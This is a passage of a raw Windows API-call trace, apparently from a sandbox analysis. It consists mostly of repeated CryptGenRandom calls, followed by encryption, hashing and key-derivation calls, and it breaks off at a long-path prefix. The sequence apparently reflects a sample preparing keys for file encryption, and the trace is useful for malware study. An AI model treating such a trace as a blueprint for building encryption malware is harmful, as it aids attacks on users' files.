dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.890] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.891] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.892] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.894] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0156.894] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0156.894] CryptCreateHash (in: hProv=0x8e36e8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448cc | out: phHash=0x1d4448cc) returned 1 [0156.894] CryptHashData (hHash=0x9ad878, pbData=0x2d7dd10, dwDataLen=0x100, dwFlags=0x0) returned 1 [0156.894] CryptDeriveKey (in: hProv=0x8e36e8, Algid=0x6610, hBaseData=0x9ad878, dwFlags=0x4, phKey=0x1d4448d0 | out: phKey=0x1d4448d0*=0x9ad338) returned 1 [0156.894] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x1, pbData=0x2d7de10, dwFlags=0x0) returned 1 [0156.895] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x4, pbData=0x2d7dcc0*=0x1, dwFlags=0x0) returned 1 [0156.895] wcslen (_String="\\\\?\\") returned 